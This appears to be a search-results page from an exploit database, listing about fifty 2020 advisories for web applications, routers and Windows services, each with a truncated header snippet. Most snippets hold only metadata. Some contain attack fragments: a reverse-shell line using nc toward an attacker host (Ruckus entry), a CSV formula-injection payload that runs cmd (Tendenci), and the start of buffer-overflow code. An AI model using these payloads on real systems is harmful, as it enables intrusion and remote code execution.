47904 matches found
Car Rental Management System 1.0 - SQL Injection / Local File include
Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include Date: 22-10-2020 Exploit Author: Mosaaed Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html Software Link:...
ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)
Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site ScriptingXSS Date: 2020- 10- 29 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://churchcrm.io/ Software Link: https://github.com/ChurchCRM/CRM Version: 4.2.1 Tested on: Kali Linux 2020.3 Proof Of Concept: ChurchCRM application allo...
Simple College Website 1.0 - 'page' Local File Inclusion
Exploit Title: Simple College Website 1.0 - 'page' Local File Inclusion Date: 30-10-2020 Exploit Author: mosaaed Vendor Homepage: https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html Software Link:...
Employee Record Management System 1.1 - Login Bypass SQL Injection
Exploit Title: Employee Record Management System 1.1 - Login Bypass SQL Injection Date: 2020–11–17 Exploit Author: Anurag Kumar RawatA1C3VENOM Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/ Version: 1.1 Tested on...
Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting
Exploit Title: Online News Portal System 1.0 - 'Title' Stored Cross Site Scripting Date: 24-11-2020 Exploit Author: Parshwa Bhavsar Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html Software Link:...
Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting
Exploit Title: Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting Date: 26-11-2020 Exploit Author: Parshwa Bhavsar Vendor Homepage: https://www.sourcecodester.com/ Software Link:...
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting
Exploit Title: Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting Date: 27-11-2020 Exploit Author: Sagar Banwa Vendor Homepage: https://projectworlds.in/ Software Link: https://projectworlds.in/free-projects/php-projects/online-voting-system-project-in-php-2/ Tested...
WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass Date: 18-11-2020 Exploit Author: Aakash Madaan Vendor Homepage: https://webdamn.com/ Software Link : https://webdamn.com/user-management-system-with-php-mysql/ Version: N/A Default Tested on: Windows 10...
DotCMS 20.11 - Stored Cross-Site Scripting
Exploit Title: DotCMS 20.11 - Stored Cross-Site Scripting Exploit Author: Hardik Solanki Vendor Homepage: https://dotcms.com/ Version: 20.11 Tested on Windows 10 Vulnerable Parameters: Template Title Steps to reproduce: 1. Login With Admin Username and password. 2. Navigate to Site -- Template --...
Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass
Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass Date: 21/11/2020 Exploit Author: Aditya Wakhlu Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html Software Link:...
Under Construction Page with CPanel 1.0 - SQL injection
Exploit Title: Under Construction Page with CPanel 1.0 - SQL injection Date: 17-11-2020 Exploit Author: Mayur Parmarth3cyb3rc0p Vendor Homepage: http://egavilanmedia.com Software Link : http://egavilanmedia.com/under-construction-page-with-cpanel/ Version: 1.0 Tested on: PopOS SQL Injection: SQL...
Expense Management System - 'description' Stored Cross Site Scripting
Exploit Title: Expense Management System - 'description' Stored Cross Site Scripting Date: 02/12/2020 Exploit Author: Nikhil Kumar Vendor Homepage: http://egavilanmedia.com/ Software Link: http://egavilanmedia.com/expense-management-system/ Tested On: Ubuntu Vunerable Parameter: "description="...
EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF
Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF Date: 01-12-2020 Exploit Author: Hardik Solanki Vendor Homepage: http://egavilanmedia.com Software Link:...
Student Result Management System 1.0 - Authentication Bypass SQL Injection
Exploit Title: Student Result Management System 1.0 - Authentication Bypass SQL Injection Google Dork: N/A Date: 11/16/2020 Exploit Author: Ritesh Gohil Vendor Homepage: https://projectnotes.org/it-projects/student-result-management-system-in-php-with-source-code/ Software Link:...
aSc TimeTables 2021.6.2 - Denial of Service (PoC)
Exploit Title: aSc TimeTables 2021.6.2 - Denial of Service PoC Date: 2020-01-12 Exploit Author: Ismael Nava Vendor Homepage: https://www.asctimetables.com/!/home Software Link: https://www.asctimetables.com/!/home/download Version: 2021.6.2 Tested on: Windows 10 Home x64 STEPS Open the program aS...
Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path
Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path Discovery by: Emmanuel Lujan Discovery Date: 2020-11-26 Vendor Homepage: https://www.acer.com/ac/en/US/content/home Tested Version: 1.0.0.3 Vulnerability Type: Unquoted Service Path Tested on OS: Windows 7 Ho...
EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
Exploit Title: EPSON Status Monitor 3 'EPSONPMRPCV406' - Unquoted Service Path Exploit Author : SamAlucard Exploit Date: 2020-27-11 Vendor : SEIKO EPSON Corp Version : EPSONPMRPCV406 8.0 Vendor Homepage : https://epson.com Tested on OS: Windows 7 Pro Analyze PoC : ============== C:\sc qc...
Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS Date: 01-11-2020 Exploit Author: yunaranyancat Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip Version: 1.0...
LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting Date: 19-11-2020 Exploit Author: Sagar Banwa Vendor Homepage: https://lepton-cms.org/ Software Link: https://lepton-cms.org/english/download/archive.php Version: 4.7.0 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29240 Stor...
Medical Center Portal Management System 1.0 - 'login' SQL Injection
Exploit Title: Medical Center Portal Management System 1.0 - 'login' SQL Injection Dork: N/A Date: 2020-11-26 Exploit Author: Aydın Baran Ertemir Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html Software Link:...
Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution Exploit Author: Saeed Bala Ahmed r0b0tG4nG Date: 2020-09-18 Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html Software Link:...
Setelsa Conacwin 3.7.1.2 - Local File Inclusion
Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion Date: 02/09/20 Exploit Author: Bryan Rodriguez Martin AKA tr3mb0 Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/ Version: 3.7.1.2 Tested on: Windows FIX: The recommendation from the vendor is to update to the...
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Discovery by: Jok3r Discovery Date: 2020-09-14 Vendor Homepage: https://home.pearsonvue.com/ Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENUTCInstallGuide/DownloadVTSInstaller.htm Test...
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities Date: 11-14-2020 Exploit Author: Matthew Aberegg Vendor Homepage: https://pandorafms.com/ Software Link: https://pandorafms.com/community/get-started/ Version: Pandora FMS 7.0 NG 749 Tested on: Ubuntu...
Online Shopping Alphaware 1.0 - Error Based SQL injection
Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection Exploit Author: Moaaz Taha 0xStorm Date: 2020-08-20 Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html Software Link:...
10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow SEH Date: 2020-09-02 Exploit Author: Sectechs Vendor Homepage: https://www.10-strike.com Version: 8.65 Tested on: Windows 7 x86 SP1 import os import sys import struct import socket crash ="A" 209 jmp short 8...
Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
Exploit Title: Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection Date: 2020-08-23 Exploit Author: @naivenom Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html Software Link:...
Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload Google Dork: inurl:''comgmapfp'' Date: 2020-03-27 Exploit Author: ThelastVvV Vendor Homepage: https://gmapfp.org/ Version:Version J3.5 /J3.5free Tested on: Ubuntu CVE: CVE-2020-23972 Description: An attacker can...
Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting
Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting Date: 27.11.2020 Exploit Author: b3kc4t Mustafa GUNDOGDU Vendor Homepage: https://www.myeventon.com/ Version: 3.0.5 Tested on: Ubuntu 18.04 CVE : 2020-29395 Description Link:...
TypeSetter 5.1 - CSRF (Change admin e-mail)
Exploit Title: TypeSetter 5.1 - CSRF Change admin e-mail Exploit Author: Alperen Ergel Software Homepage: https://www.typesettercms.com/ Version : 5.1 Tested on: Kali & ubuntu Category: WebApp Description Attacker can change admin e-mail address Vulnerable - Go to the admin page view preferences ...
Tendenci 12.3.1 - CSV/ Formula Injection
Exploit Title: Tendenci 12.3.1 - CSV/ Formula Injection Date: 2020-10-29 Exploit Author: Mufaddal Masalawala Vendor Homepage: https://www.tendenci.com/ Software Link: https://github.com/tendenci/tendenci Version: 12.3.1 Payload: =10+20+cmd|' /C calc'!A0 Tested on: Kali Linux 2020.3 Proof Of...
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
Exploit Title: Intelr Management and Security Application 5.2 - User Notification Service Unquoted Service Path Date: 2020-08-28 Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.intel.com/ Version: v5.2 Tested on: Windows 7 Source:...
Social Networking Site - Authentication Bypass (SQli)
Exploit Title: Social Networking Site - Authentication Bypass SQli Date: 2020-11-17 Exploit Author: gh1mau Email: [email protected] Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/ Vendor Homepage:...
ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure Date: 2020-11-20 Exploit Author: Zagros Bingol Vendor Homepage: http://www.atx.com Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/ Version: 2.0 and earlier Tested on:...
YATinyWinFTP - Denial of Service (PoC)
Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Date: 20.08.2020 Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10...
Intelbras Router RF 301K 1.1.2 - Authentication Bypass
Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass Date: 27/11/2020 Exploit Author: Kaio Amaral Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301Kv1.1.2.zip Version: firmware version 1.1.2 Tested on:...
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution 3 Google Dork: intext:"httpfileserver 2.3" Date: 28-11-2020 Remote: Yes Exploit Author: Óscar Andreu Vendor Homepage: http://rejetto.com/ Software Link: http://sourceforge.net/projects/hfs/ Version: 2.3.x Tested on: Windows...
Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
Exploit Title: Best Support System 3.0.4 - 'ticketbody' Persistent XSS Authenticated Google Dork: "Powered By Best Support System" Date: 2020-08-23 Exploit Author: Ex.Mi https://ex-mi.ru Vendor: Appsbd https://appsbd.com Software Version: 3.0.4 Software Link:...
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow DoS Date: 2020-08-20 Exploit Author: Patrik Lantz Vendor Homepage: https://pupnp.sourceforge.io/ Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download Version: = 1.6.6 Tested on:...
Moodle 3.8 - Unrestricted File Upload
Exploit Title: Moodle 3.8 - Unrestricted File Upload Date: 2019-09-08 Exploit Author: Sirwan Veisi Vendor Homepage: https://moodle.org/ Software Link: https://github.com/moodle/moodle Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4... Tested on: Moodle Version 3.8 CWE : CWE-434 I found an...
House Rental 1.0 - 'keywords' SQL Injection
Exploit Title: House Rental 1.0 - 'keywords' SQL Injection Exploit Author: Bobby Cooke boku & Adeeb Shah @hyd3sec Date: 2020-08-07 Vendor Homepage: https://projectworlds.in Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip Version: 1.0 Tested On: Windows 10 Pro...
Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF Date: 2020-07-30 Author: Julien Ahrens Vendor Homepage: https://www.acronis.com Version: 12.5 Build 16341 CVE: CVE-2020-16171 VERSIONS AFFECTED ==================== Acronis Cyber Backup v12.5 Build 16327 and probably belo...
Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection Authenticated Exploit Author: SunCSR Sun Cyber Security Research - Nguyen Khang Google Dork: N/A Date: 2020-08-24 Vendor Homepage: https://accesspressthemes.com Software Link:...
Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
Exploit title: Laravel Administrator 4 - Unrestricted File Upload Authenticated Author: Victor Campos and Xavi Beltran Contact: [email protected] Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/ Date: 25/3/2020 Software link:...
Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...
ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
Exploit Title: ElkarBackup 1.3.3 - 'Policyname' and 'PolicyDescription' Stored Cross-site Scripting Date: 2020-08-22 Exploit Author: Vyshnav NK Vendor Homepage: https://www.elkarbackup.org/ Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation Version: 1.3.3 Tested on: Linux...
Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting Date: 11/27/2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: http://demo.themeftc.com/wibar Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 Version:...
WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting Google Dork: "WonderCMS" Date: 2020-11-27 Exploit Author: SunCSR Sun Cyber Security Research Vendor Homepage: https://www.wondercms.com/ Software Link:...
SAP Lumira 1.31 - Stored Cross-Site Scripting
Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting Date: 13.08.2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: https://www.sap.com Software Link: SAP Lumira Version: 123 •...
Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Date: 2020-08-29 Exploit Author: CrossWire Vendor Homepage: https://www.foxitsoftware.com/ Software Link:...